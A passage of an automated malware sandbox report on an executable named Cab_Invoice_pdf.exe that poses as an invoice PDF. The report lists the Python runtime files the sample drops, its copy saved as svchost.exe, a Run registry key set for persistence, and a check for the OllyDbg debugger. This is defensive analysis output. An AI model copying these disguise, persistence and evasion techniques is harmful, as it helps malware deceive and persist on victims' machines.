Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\win32gui.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\python38.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\_win32sysloader.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\ucrtbase.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\select.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\select.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\win32api.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\_overlapped.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\libcrypto-1_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\python38.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\python38.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DAB7880 PyArg_ParseTuple,?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z,PyEval_SaveThread,IsIconic,PyEval_RestoreThread,Py_BuildValue,19_2_6DAB7880
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_013129F0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_013129F0

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
Source: Cab_Invoice_pdf.exe, 00000003.00000002.564043749.00000000030D0000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE C
Source: C:\Windows\System32\svchost.exe TID: 1876Thread sleep time: -150000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6360Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\_overlapped.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\_win32sysloader.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\_overlapped.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\_asyncio.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\_win32sysloader.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\_asyncio.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\pyexpat.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\pyexpat.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\pyexpat.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\_asyncio.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\_win32sysloader.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
